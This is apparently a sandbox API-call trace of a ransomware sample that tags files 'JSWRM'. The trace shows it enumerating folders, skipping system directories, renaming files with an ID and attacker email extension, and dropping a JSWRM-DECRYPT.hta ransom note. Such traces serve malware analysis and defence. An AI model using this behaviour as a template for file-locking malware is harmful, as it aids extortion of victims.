[0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.943] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.944] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10083861658849096) returned 0 [0067.944] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.944] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.944] CloseHandle (hObject=0xffffffff) returned 1 [0067.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0067.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0067.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0067.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.945] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.945] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0067.945] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0067.945] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2=".") returned 1 [0067.945] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="..") returned 1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="...") returned 1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="windows") returned -1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="recovery") returned -1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="perflogs") returned -1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="documents and settings") returned 1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="system volume information") returned -1 [0067.946] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="msocache") returned -1 [0067.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickAnimation.avi", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0067.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickAnimation.avi", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickAnimation.avi", lpUsedDefaultChar=0x0) returned 18 [0067.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickAnimation.avi", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0067.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickAnimation.avi", cchWideChar=18, lpMultiByteStr=0x241178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickAnimation.avi", lpUsedDefaultChar=0x0) returned 18 [0067.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.946] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.948] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0067.948] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0067.948] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0067.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.948] CloseHandle (hObject=0xffffffff) returned 1 [0067.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0067.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0067.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.949] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd121ea9a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd121ea9a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc4800, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2=".") returned 1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="..") returned 1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="...") returned 1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="windows") returned -1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="recovery") returned -1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="perflogs") returned -1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="documents and settings") returned 1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="system volume information") returned -1 [0067.949] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="msocache") returned -1 [0067.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickLearningWizard.exe", lpUsedDefaultChar=0x0) returned 23 [0067.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0067.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe", cchWideChar=23, lpMultiByteStr=0x241060, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickLearningWizard.exe", lpUsedDefaultChar=0x0) returned 23 [0067.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0067.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.950] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2=".") returned 1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="..") returned 1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="...") returned 1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="windows") returned -1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="recovery") returned -1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="perflogs") returned -1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="documents and settings") returned 1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="$RECYCLE.BIN") returned 1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="system volume information") returned -1 [0067.950] lstrcmpiW (lpString1="fr-CA", lpString2="msocache") returned -1 [0067.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0067.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\jswrm-decrypt.hta")) returned 0xffffffff [0067.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.951] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.951] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.952] CloseHandle (hObject=0x454) returned 1 [0067.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0067.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0067.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\jswrm-decrypt.hta")) returned 0x20 [0067.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.954] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f29af4f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", 